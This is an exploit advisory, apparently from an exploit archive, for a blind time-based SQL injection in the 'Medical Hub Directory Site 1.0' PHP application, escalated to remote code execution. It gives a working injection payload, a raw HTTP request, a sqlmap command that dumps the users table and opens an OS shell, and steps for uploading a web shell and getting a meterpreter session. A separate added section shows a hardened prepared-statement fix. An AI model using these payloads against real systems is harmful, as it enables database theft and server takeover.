## https://sploitus.com/exploit?id=PACKETSTORM:166550
# Title: Medical Hub Directory Site 1.0 Blind Time SQLi To RCE
# Author: Hejap Zairy  
# Date: 30.07.2022  
# Vendor: https://www.sourcecodester.com/php/15252/simple-medical-hub-directory-site-phpoop-source-code.html  
# Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/mhds.zip
# Reference: https://github.com/Matrix07ksa  
# Tested on: Windows, MySQL, Apache  
  
  
  
# Steps
# 1 - Go to: https://0day.gov//mhds/admin/?page=category/manage_category&id=6
# 2 - Manually inject the blind SQLi payload: https://0day.gov//mhds/admin/?page=category/manage_category&id=6 OR NOT 8425=8425#&password=hejap&button=Login
# 3 - SQLi to RCE r00t
# 4 - Upload web shell
# 5 - Web shell to meterpreter full tty shell
  
# Vulnerable code (PHP)
  
---  
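```
<?php
if(isset($_GET['id'])){
    // Vulnerable: $_GET['id'] is interpolated into the SQL string without
    // validation or parameter binding, so the request controls the query text.
    $qry = $conn->query("SELECT * FROM `category_list` where id = '{$_GET['id']}' and delete_flag = 0 ");
    if($qry->num_rows > 0 ){
        // Every named column of the row becomes a local variable via $$k.
        foreach($qry->fetch_array() as $k => $v){
            if(!is_numeric($k))
                $$k = $v;
        }
    }
}
?>
```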
---  
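
A hardened form of the vulnerable block above, added here as an example and not taken from the application or the advisory: the `id` value is validated as an integer and passed as a bound prepared-statement parameter. The function name `load_category` and the `$category` variable are hypothetical; `$conn` is assumed to be the application's `mysqli` connection, as in the original snippet, with mysqlnd available for `get_result()`.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not part of the application): loads one category row
// using a validated integer id and a bound parameter.
function load_category(mysqli $conn, $rawId): ?array
{
    // Reject anything that is not a positive integer before it reaches SQL.
    // Arrays (?id[]=1) and strings such as "6' AND ..." both fail here.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // The id is sent as a bound integer parameter, separate from the SQL text,
    // so it can no longer change the structure of the query.
    $stmt = $conn->prepare(
        'SELECT * FROM `category_list` WHERE id = ? AND delete_flag = 0'
    );
    if ($stmt === false) {
        return null; // prepare() failed with mysqli error reporting turned off
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // get_result() requires mysqlnd
    $stmt->close();

    return $row ?: null;
}

// Call site replacing the original block. The row stays in one array instead
// of being expanded into local variables with $$k, so column names coming from
// the database cannot overwrite variables already in scope.
if (isset($conn, $_GET['id'])) {
    $category = load_category($conn, $_GET['id']);
    if ($category === null) {
        http_response_code(404); // unknown or malformed id
    }
}
```
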
#Status: CRITICAL  
[+] Payload GET  
  
---  
GET /mhds/admin/?page=category/manage_category&id=6 HTTP/1.1  
Host: 0day.gov  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: PHPSESSID=ahm8bmdjtm25mldhc2rm7dc4f2  
Upgrade-Insecure-Requests: 1  
Cache-Control: max-age=0  
---  
  
```  
---  
Parameter: id (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: page=category/manage_category&id=6' AND (SELECT 8526 FROM (SELECT(SLEEP(5)))jfSR) AND 'KRZU'='KRZU  
---  
  
  
```  
# Blind Time SQLi to RCE
# Exploit
  
  
sqlmap -r hejap_0day --dbs --time-sec=10 --tamper=space2comment --threads=5 -p id -D mhds_db -T users --dump --eta --technique=t --hex --os-shell  
  
  
# Description:  
The Blind Time SQLi vulnerability was converted to RCE due to the permissions I have in the database, and it was privesc.
  
# Proof and Exploit:  
https://i.imgur.com/Siu2l0C.png  
https://i.imgur.com/fU4As6a.png